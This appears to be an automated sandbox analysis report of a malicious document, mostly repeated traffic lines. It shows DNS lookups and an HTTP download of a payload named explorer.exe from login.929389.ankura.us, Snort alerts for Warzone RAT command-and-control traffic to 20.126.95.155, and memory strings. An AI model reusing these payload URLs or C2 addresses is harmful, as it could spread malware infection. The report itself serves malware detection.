Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: login.929389.ankura.us
Source: global traffic DNS query: name: login.929389.ankura.us
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 159.223.2.212:80

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 20.126.95.155:7800
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 20.126.95.155
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View ASN Name: CELANESE-US CELANESE-US
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 20.126.95.155:7800
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ank
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/Aw
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exePE
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.926952704.000000001B39C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
